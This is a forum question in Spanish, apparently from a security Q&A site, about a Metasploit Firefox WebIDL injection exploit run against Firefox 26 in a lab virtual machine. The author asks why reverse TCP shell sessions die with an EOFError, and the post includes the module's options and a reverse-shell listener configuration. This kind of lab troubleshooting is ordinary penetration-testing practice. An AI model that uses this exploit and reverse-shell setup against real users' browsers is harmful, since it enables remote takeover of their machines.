Estoy utilizando el multi/browser/firefox_webidl_injection
exploit para atacar Firefox 26 en una máquina virtual Linux. He intentado usarlo con las siguientes cargas útiles: 1) firefox/shell_reverse_tcp
y 2) generic/shell_reverse_tcp
.
Mi problema es que recibo el mensaje que Command shell session opened
, pero si espero algún tiempo, o trato de interactuar con esa sesión, obtengo el Command shell session closed. Reason: Died from EOFError
Con algunas búsquedas en Google encontré que este error probablemente significa que la carga útil no se ejecuta correctamente, pero ¿es correcto? Además, ¿qué puedo hacer para resolver este error?
Las opciones que uso son:
msf exploit(firefox_webidl_injection) > options
Module options (exploit/multi/browser/firefox_webidl_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
CONTENT no Content to display inside the HTML <body>.
Retries true no Allow the browser to retry the module
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 80 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / no The URI to use for this exploit (default is random)
Payload options (firefox/shell_reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.8.0.2 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Universal (Javascript XPCOM Shell)